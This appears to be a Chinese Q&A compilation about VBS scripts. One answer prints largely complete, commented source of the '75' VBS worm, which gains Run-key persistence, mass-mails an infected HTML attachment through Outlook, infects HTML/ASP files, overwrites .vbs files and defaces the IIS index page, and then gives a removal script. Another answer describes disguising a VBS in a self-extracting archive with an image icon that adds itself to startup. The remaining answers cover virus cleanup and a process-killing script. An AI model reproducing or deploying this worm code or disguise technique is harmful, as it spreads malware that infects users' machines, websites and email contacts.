『壹』 關於一個能自動運行某個程序的VBS腳本
dim fso,oshell,path1
path1 = "g:\share\jw\run.exe"
set oshell = wscript.createobject ("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if (fso.fileexists(path1)) then
oshell.run path1
oshell.run "cmd /k rarp.BAT" '把這句加上就行了
else
end if
『貳』 如何讓電腦自動運行VBS腳本
電腦自動運行接受的文件是不太可能的,除非有人破解電腦植入木馬
可以製作一個自解壓的RAR文件(後綴為.exe),然後壓縮成.rar文件,把自解壓文件的圖標偽裝成影像或者圖片的圖標,當然自解壓文件里也要包含一個和圖標相關的文件
比如使用.jpg的圖標,然後在壓縮包內放一張YY圖,還有你的VBS文件,然後再用一個Bat文件將VBS加入自啟動項,最後全部打包成自解壓文件
關於只開機自動運行3,之後失效的方法為,使用一個bat文件,每次開機的時候自動運行你的VBS文件,然後還往一個特定的文本文檔之追加一個字元,比如5.每次開機追加一個,當開機三次後,特定的文本文檔的內容就會變成555,然後再在bat的頭部寫一個判斷,當X.txt的內容=555的時候,自動刪除自身即可。
『叄』 求一些vbs病毒的腳本
要學習 VBS,具有一些VB的基礎知識就夠了。
這個病毒的主要攻擊方法是:通過網路及郵件進行傳播,並且不斷地向目標郵件服
務器發送大量郵件,並且在傳染過程中檢測網路主機的名稱中是否有目標字元,如
果有則進行破壞攻擊。
下面將結合具體的程序逐步進行介紹,由於篇幅關系,對一些語句進行了縮減。
'@ thank you! make use of other person to get rid of an enemy, white trap _2001
''開場白,第一個字元「@」是這個病毒傳染時的標記
on error resume next ''這一句很重要,主要是在程序執行時如果發生錯誤就接著
''執行下一條語句,防止談出出錯對話框,否則就不能偷偷
''的干壞事啦。這里有一個技巧,就是在程序編制調試階段,
''最好不要這一條語句,因為它會忽略錯誤,使你的調試工
''作不易完成。
dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE, whb(), title(10) ''聲明各個變數
smailc = 4
Redim whb(smailc)
whb(0) = "[email protected]"
...
whb(3) = "[email protected]"
''以上這四個郵件地址就是被攻擊的目標,當然已經進行了修改,不是真實地址
title(0) = "Thanks for helping me!"
...
title(8) = "the sitting is open!"
title(9) = ""
''以上這十條字元串是病毒執行時隨機顯示在IE標題欄里的信息。如果你的IE標題欄
''顯示了其中的某條信息,呵呵,一定要接著往下看
defpath = "C:\Readme.html" ''將隨郵件一起發送的病毒體
MAX_SIZE = 100000
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
''定義兩個注冊表的鍵值變數
main ''執行主函數
''下面就是程序中所需的各個函數的定義部分,整個VBS程序將由windows目錄中的
''WScript.exe文件解釋執行,如果將這個文件改名或刪除,當然VBS程序也就不能執行
''了,如此便阻止了病毒的執行。在用殺毒軟體殺毒時,往往病毒傳播的速度要比殺
''毒的速度快,如果出現這種情況,應該先將WScript.exe文件改名,阻止病毒傳播,
''等殺完毒後,再改回來,不致影響其他正常的VBS程序的執行。
sub main()
on error resume next
dim w_s
w_s= WScript.ScriptFullName ''得到此文件名稱
if w_s = "" then
Err.Clear
set fso = CreateObject("Scripting.FileSystemObject")
''隨著VB編程語言的完善,微軟也推出了一種全新的文件操作方法:文件系
''統對象(FileSystemObject)。這個對象,及一些相關對象,封裝了所有
''的文件操作。這個病毒程序基本展示了所有的這些操作,因此,如果您要
''利用VBS進行文件操作編程,將這個病毒源碼作為參考文檔,肯定不錯。
if getErr then
Randomize
ra = int(rnd() * 7)
doucment.write title(ra)
ExecuteMail ''打開有毒的頁面
else
ExecutePage ''賦值成功,進行傳染,攻擊
end if
else
ExecuteVbs ''從病毒體文件「system.dll」提取病毒
end if
end sub
Function getErr()
''本函數主要是檢測前一條語句是否成功返回了Scripting.FileSystemObject對象,
''內容略
end function
sub ExecutePage()
dim Html_Str,adi,vf,wdf, wdf2,wdf3,wdsf, wdsf2
Vbs_Str = GetScriptCode("vbscript") ''獲得此程序的VBScript code
Js_Str = GetJavaScript()
Code_Str = MakeScript(encrypt(Vbs_str),true) ''進行加密處理
Html_Str = MakeHtml(encrypt(Vbs_str), true)
Gf
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf = w2 & "user.dll"
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
set vf = fso.OpenTextFile (wdf, 2, true)
vf.write Vbs_Str
vf.close
''僅用以上三條語句便完成了病毒體文件 "user.dll"的製作,其中對象函數
''OpenTextFile (wdf, 2, true)的三個參數分別是:
''①文件名,②讀=1或寫=2,③文件不存在時是否創建;
''當前,FileSystemObject對於文本文件的操作有較強的優勢,對binary文件
''的操作還有待加強。下面依次生成其他的文件,內容略
Writereg MSWKEY & "CurrentVersion\Run\Mdm", wdsf, ""
Writereg MSWKEY & "CurrentVersion\RunServices\Profile", wdsf2, ""
''將Mdm.vbs,Profile.vbs兩個腳本文件加入到啟動組當中,隨Win啟動自動執行
SendMail
Hackpage
if TestUser then
Killhe
else
mk75
end if
set adi = fso.Drives ''所有驅動器對象
for each x in adi ''遍歷所有的驅動器
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & "\")
end if
next
if fso.FileExists(defpath) then fso.DeleteFile defpath
''如果存在"C:\Readme.html" ,就刪除它
end sub
sub ExecuteMail()
''此函數製作病毒文件"C:\Readme.html" ,並打開它,
''由這一段程序,可以看出VBS的簡潔高效
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
Set Stl = CreateObject("Scriptlet.TypeLib")
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write()
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no"
end sub
sub ExecuteVbs()
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY & "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile (w2 & "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
if TestUser then
Killhe
else
mk75
end if
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x & "\")
end if
next
end sub
sub Gf()
w1=fso.GetSpecialFolder(0) & "\" ''獲得Windows的路徑名,
w2=fso.GetSpecialFolder(1) & "\" ''獲得系統文件夾路徑名
end sub
function Readreg(key_str)
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype)
''對注冊表進行寫入操作,讀操作類似,可以由此看到vbs的注冊表操作非常簡單明了。
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing ''關閉不用的資源,算是病毒的良好行為
end function
function MakeHtml(Sbuffer, iHTML)
''製作html文件的內容
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="<" & "HTML><" & "HEAD><" & "TITLE>" & title(ra) & "</" & "TITLE><" & "/HEAD>" & _
"<BO" & "AD>" & vbcrlf & MakeScript(Sbuffer, iHTML) & vbcrlf & _
"<" & "/BOAD><" & "/HTML>"
end Function
function MakeScript(Codestr, iHTML)
''製作病毒的可執行script code
if iHTML then
dim DocuWrite
DocuWrite = "document.write('<'+" & "'SCRIPT Language=JavaScript>\n'+" & _
"jword" & "+'\n</'" & "+'SCRIPT>');"
DocuWrite = DocuWrite & vbcrlf & "document.write('<'+" & "'SCRIPT Language=VBScript>\n'+" & _
"nword" & "+'\n</'" & "+'SCRIPT>');"
MakeScript="<" & "SCRIPT Language=JavaScript>" & vbcrlf & "var jword = " & _
chr(34) & encrypt(Js_Str) & chr(34) & vbcrlf & "var nword = " & _
chr(34) & Codestr & chr(34) & vbcrlf & "nword = unescape(nword);" & vbcrlf & _
"jword = unescape(jword);" & vbcrlf & DocuWrite & vbcrlf & "</" & "SCRIPT>"
else
MakeScript= "<" & "SCRIPT Language=JavaScript>" & Codestr & "</" & "SCRIPT>"
end if
end function
function GetScriptCode(Languages)
''此函數獲得運行時的Script code,
''內容略
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser()
''此函數通過鍵值檢測網路主機是否是攻擊目標
''內容略
end function
function mk75()
''檢測日期是否符合,如果符合,發控制台命令,使系統癱瘓
end function
function SendMail()
''利用outlook發送攜帶病毒體的郵件,Microsoft Outlook是可編程桌面信息管理程序,
''outlook可以作為一個自動化伺服器(Automation servers),因此很容易實現自動發送
''郵件,從這里也可以看出,先進的東西難免會被反面利用,如果你也想用程序控制發送
''郵件,可以仔細研究下面的代碼,
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
Randomize
at=fso.GetSpecialFolder(1) & "\Readme.html" ''要發送的附件文件
set Oa = CreateObject("Outlook.Application") ''製作outlook對象
set wab = Oa.GetNameSpace("MAPI") ''取得Outlook MAPI名字空間
for j = 1 to wab.AddressLists.Count ''遍歷所有聯系人
eins = wab.AddressLists(j)
wreg=Readreg (HCUW & eins)
if (wreg="") then wreg = 1
Eaec = eins.AddressEntries.Count ''地址表的Email記錄數
if (Eaec > Int(wreg)) then
for x = 1 to Eaec
arrsm = wab.AddressEntries(x)
areg = Readreg(HCUW & arrsm)
''讀注冊表中的標記,避免重復發送
if (areg = "") then
set fm = wab.CreateItem(0) ''創建新郵件
with fm
ra = int(rnd() * 7)
.Recipients.Add arrsm ''收件人
.Subject = title(ra) ''郵件的標題
.Body = title(ra) ''郵件的正文內容
.Attachments at ''病毒文件作為附件
.Send ''發送郵件
Writereg HCUW & arrsm, 1, "REG_DWORD"
end with
end if
next
end if
Writereg HCUW & eins, Eaec, ""
next
set Oa = Nothing
window.setTimeout "SendMail()", 10000 ''每100秒發送一次
end function
sub SearchHTML(Path)
''這個函數遞歸搜索所有需感染的文件,如果你想批量處理文件,這是非常典型
''的樣例代碼
on error resume next
dim pfo, psfo, pf, ps, pfi, ext
if instr(Path, fso.GetSpecialFolder(2)) > 0 then exit sub
''fso.GetSpecialFolder(2)獲得臨時文件夾路徑名,
''fso.GetSpecialFolder(0)獲得Windows的路徑名,
''fso.GetSpecialFolder(1)獲得系統文件夾路徑名
set pfo = fso.GetFolder(Path)
set psfo = pfo.SubFolders
for each ps in psfo
SearchHTML(ps.Path)
set pf = ps.Files
for each pfi in pf
ext = LCase(fso.GetExtensionName(pfi.Path))
if instr(ext, "htm") > 0 or ext = "plg" or ext = "asp" then
if Code_Str<>"" then AddHead pfi.Path, pfi, 1
elseif ext= "vbs" then
AddHead pfi.Path,pfi, 2
end if
next
next
end sub
sub Killhe()
''看函數名就知道硬碟又要倒霉啦
end sub
sub Hackpage()
dim fi
H = "C:\InetPut\wwwroot"
if fso.FolderExists(H) then
set fi = fso.GetFile(H & "\index.htm")
AddHead H & "\index.htm",fi,1
end if
end sub
sub AddHead(Path, f, t)
''這個函數負責感染文件,之所以不進行省略,因為在後面編制殺毒程序時要用到這一段。
on error resume next
dim tso, buffer,sr
if f.size > MAX_SIZE then exit sub
set tso = fso.OpenTextFile(Path, 1, true)
buffer = tso.ReadAll()
tso.close
if (t = 1) then
''如果是"htm","plg", "asp" 文件,則在其中加入病毒代碼
if UCase(Left(LTrim(buffer), 7)) <> "<SCRIPT" then
set tso = fso.OpenTextFile(Path, 2, true)
tso.Write Code_Str & vbcrlf & buffer
tso.close
end if
else ''否則,用病毒體程序覆蓋掉原文件,這個有點損
if mid(buffer, 3, 2) <> "'@" then
tso.close
sr=w2 & "user.dll"
if fso.FileExists(sr) then fso.CopyFile sr, Path
end if
end if
end sub
''以上對病毒源碼進行了分析,是不是有所收獲,趕快打開紀事本,親自開發一個vbs
''程序吧,「水能載舟,亦能覆舟」,就編一個清除它的殺毒程序,算是本文的加強練習。
''
''感興趣的朋友可以看一下筆者根據源程序改編的殺毒程序。
附:
''''''''kill75.vbs''''''''''''
'本程序由源病毒碼修改而成
Dim fso, w1, w2, MSWKEY, HCUW
Dim defpath
Dim bdNUM ''記錄殺除病毒文件的個數
Const MAX_SIZE = 100000
main
Sub main()
On Error Resume Next
bdNUM=0
defpath = "C:\Readme.html"
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
Err.Clear
Set fso = CreateObject("Scripting.FileSystemObject")
ExecuteKill
End Sub
Sub ExecuteKill()
On Error Resume Next
Dim adi, vf, wdf, wdf2, wdf3, wdsf, wdsf2
Gf
wdsf = w2 & "Mdm.vbs"
wdsf2 = w1 & "Profile.vbs"
wdf = w2 & "user.dll"
wdf2 = w2 & "Readme.html"
wdf3 = w2 & "system.dll"
If fso.FileExists(wdsf) Then fso.DeleteFile wdsf: bdNUM = bdNUM + 1
If fso.FileExists(wdsf2) Then fso.DeleteFile wdsf2: bdNUM = bdNUM + 1
If fso.FileExists(wdf) Then fso.DeleteFile wdf: bdNUM = bdNUM + 1
If fso.FileExists(wdf2) Then fso.DeleteFile wdf2: bdNUM = bdNUM + 1
If fso.FileExists(wdf3) Then fso.DeleteFile wdf3: bdNUM = bdNUM + 1
If fso.FileExists(w2 & "75.htm") Then fso.DeleteFile w2 & "75.htm": bdNUM = bdNUM + 1
If fso.FileExists(defpath) Then fso.DeleteFile defpath: bdNUM = bdNUM + 1
DeleteReg MSWKEY & "CurrentVersion\Run\Mdm"
DeleteReg MSWKEY & "CurrentVersion\RunServices\Profile"
DeleteReg MSWKEY & "CurrentVersion\Run\75"
Set adi = fso.Drives
For Each x In adi
If x.DrivesType = 2 Or x.DrivesType = 3 Then
Call SearchHTML(x & "\")
End If
Next
End Sub
Sub Gf()
w1 = fso.GetSpecialFolder(0) & "\"
w2 = fso.GetSpecialFolder(1) & "\"
End Sub
Function DeleteReg(key_str)
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete key_str
Set tmps = Nothing
End Function
Sub SearchHTML(Path)
On Error Resume Next
Dim pfo, psfo, pf, ps, pfi, ext
If InStr(Path, fso.GetSpecialFolder(2)) > 0 Then Exit Sub
Set pfo = fso.GetFolder(Path)
Set psfo = pfo.SubFolders
For Each ps In psfo
SearchHTML (ps.Path)
Set pf = ps.Files
For Each pfi In pf
FileLabel.Caption = pfi
DoEvents
ext = LCase(fso.GetExtensionName(pfi.Path))
If InStr(ext, "htm") > 0 Or ext = "plg" Or ext = "asp" Then
CutHead pfi.Path, pfi, 1
ElseIf ext = "vbs" Then
CutHead pfi.Path, pfi, 2
End If
Next
Next
End Sub
Sub CutHead(Path, f, t)
On Error Resume Next
Dim tso, buffer, sr, wz, fbuf
Set tso = fso.OpenTextFile(Path, 1, True)
buffer = tso.ReadAll()
tso.Close
If (t = 1) Then
If UCase(Left(LTrim(buffer), 7)) = "<SCRIPT" Then
If InStr(1, buffer, "jword") > 0 Then
wz = InStr(1, buffer, "</SCRIPT>")
If wz > 10000 Then
fbuf = Right(buffer, Len(buffer) - wz - 10)
Set tso = fso.OpenTextFile(Path, 2, True)
tso.Write fbuf
tso.Close
bdNUM = bdNUM + 1
DoEvents
End If
End If
End If
Else
If Mid(buffer, 3, 2) = "'@" Then
re = MsgBox("是否想刪除:" + Path + ",它可能已經變成了75病毒", vbYesNo)
If (re = vbYes) Then
tso.Delete
bdNUM = bdNUM + 1
DoEvents
End If
End If
End If
End Sub
Function getErr()
If Err.Number <> 0 Then
getErr = True
Err.Clear
Else
getErr = False
End If
End Function
『肆』 如何殺vbs腳本病毒
如果是朋友發你文件後!出現這種現象 很可能是惡做劇!
『伍』 vbs腳本病毒專殺工具
Trojan.DL.VBS.Agent的變種
[編輯本段]
Trojan.DL.VBS.Agent病毒是由於網友訪問的網站伺服器上被放置了iframe,指向一個發送木馬的網站,對我們來說,只要安裝了先進的殺毒軟體,訪問這個網站就會報警,報告發現某某病毒,然後殺除病毒。我們也不用緊張,只要下載安裝最新的IE補丁就可以防止被黑。同時再用殺毒軟體殺除在緩存中的病毒,清空緩存就可以了。其實主要問題在伺服器,它會使所有來訪者遇到可能的威脅,這些伺服器往往是被黑了。
病毒的危害
[編輯本段]
現在放這些病毒的破壞者只是在網站的主頁或conn.asp文件中加入iframe代碼,想利用網站,使訪問者的瀏覽器下載他們的惡意代碼,然後他們在訪問者的機上搞破壞,如偷游戲密碼、偷盜QQ號碼、盜取網上銀行密碼等等等。
病毒下載器(trojan.dl.vbs)危害性很大,可以在隱藏在網站文件中,訪問該網站的用戶都可能被感染病毒,現在該病毒的變種已經達到69種,以下是最新的20種變種,查殺請用瑞星正版殺毒軟體:
更多的變種
[編輯本段]
1. 腳本病毒 Trojan.DL.VBS.Agent.a
2. 腳本病毒 Trojan.DL.VBS.Agent.b
3. 腳本病毒 Trojan.DL.VBS.Agent.c
4. 腳本病毒 Trojan.DL.VBS.Agent.cef
5. 腳本病毒 Trojan.DL.VBS.Agent.ceg
6. 腳本病毒 Trojan.DL.VBS.Agent.ceh
7. 普通文件病毒 Trojan.DL.VBS.Agent.cei
8. 腳本病毒 Trojan.DL.VBS.Agent.cej
9. 腳本病毒 Trojan.DL.VBS.Agent.cek
10. 腳本病毒 Trojan.DL.VBS.Agent.cel
11. 腳本病毒 Trojan.DL.VBS.Agent.cem
12. 腳本病毒 Trojan.DL.VBS.Agent.cen
13. 腳本病毒 Trojan.DL.VBS.Agent.ceo
14. 腳本病毒 Trojan.DL.VBS.Agent.cep
15. 腳本病毒 Trojan.DL.VBS.Agent.ceq
16. 腳本病毒 Trojan.DL.VBS.Agent.cer
17. 腳本病毒 Trojan.DL.VBS.Agent.d
18. 腳本病毒 Trojan.DL.VBS.Agent.e
19. 腳本病毒 Trojan.DL.VBS.Agent.f
20. 腳本病毒 Trojan.DL.VBS.Agent.g
冊除方法如下
[編輯本段]
手動刪除:按照殺軟給出病毒對應的文件名和路徑;開始--運行--regedit,打開注冊表,用游標選取注冊表中的「我的電腦」,菜單--編輯 --查找,從頭到尾查找這文件的項目,右鍵--刪除,F3繼續,直至查完刪完,最後再刪除硬碟文件;不讓刪的用IceSword對照位置刪除
開始→控制面板→添加或刪除程序→分別選中→MMSAssist-winstp→卸載
以下項目每一點分隔代表一個服務
開始→控制面板→性能和維護→管理工具→服務→查找→JMediaService,StdService右擊→屬性→啟動類型→禁止→應用→停止→確定。
重新啟動電腦, 開機檢測完後, 按 鍵(可以一直按到啟動菜單出來為止), 選擇安全模式進入Windows
幾種選擇
1.下個unlocker小軟體,可以將拒絕訪問的文件解鎖.
(下載安裝後,找到感染的文件點右鍵,第一行)這里同時將住冊表中的XXX.EXE類文件刪掉
VBS病毒
[編輯本段]
VBS病毒是用VB Script編寫而成,該腳本語言功能非常強大,它們利用Windows系統的開放性特點,通過調用一些現成的Windows對象、組件,可以直接對文件系統、注冊表等進行控制,功能非常強大。應該說病毒就是一種思想,但是這種思想在用VBS實現時變得極其容易。VBS腳本病毒具有如下幾個特點:
編寫簡單、破壞力大、感染力強、傳播范圍廣、變種多、欺騙性強;可以通過通過Email附件傳播;通過區域網共享傳播;通過感染htm、asp、jsp、php等網頁文件傳播;通過IRC聊天通道傳播;
相關工具
[編輯本段]
可以使用這些工具進行查殺
auto病毒專殺工具
AVG Anti-Spyware
Windows清理助手
a-squared Free
2.可以使用EWIDO來查殺!
3.開機的時候按F8,進入「安全模式」,在那種模式下刪除。也可以在刪除之前,關閉所有無用進程(因為這些進程有的就是該文件,有的阻止了刪除),再刪除
『陸』 自動運行程序的vbs腳本怎麼寫
我不知道,但是看你沒人頂,頂你一下!
『柒』 這段vbs腳本殺軟報毒
跟殺軟敏感性有關,有些殺軟對於VBS腳本都是提示有風險,你的程序要麼很巧合的包含了一段特徵碼。要麼純粹就是敏感性問題
『捌』 用VBS如何判斷並殺掉進程和啟動程序
可以使用 wmi對象獲取進程列表 然後對符合條件的進程進行 close
『玖』 怎樣用VBS腳本每天定時關閉進程
Set wmiService = GetObject("winmgmts:\\.\root\cimv2")
Set wmiObjects = wmiService.ExecQuery("SELECT * FROM Win32_process where name='wscript.exe'")
eTart = "12:26"
eT = FormatDateTime(eTart,4)
Do
Tims = FormatDateTime(Time,4)
For Each wmiObject In wmiObjects
If Tims =eT then
wmiObject.terminate
End If
Next
loop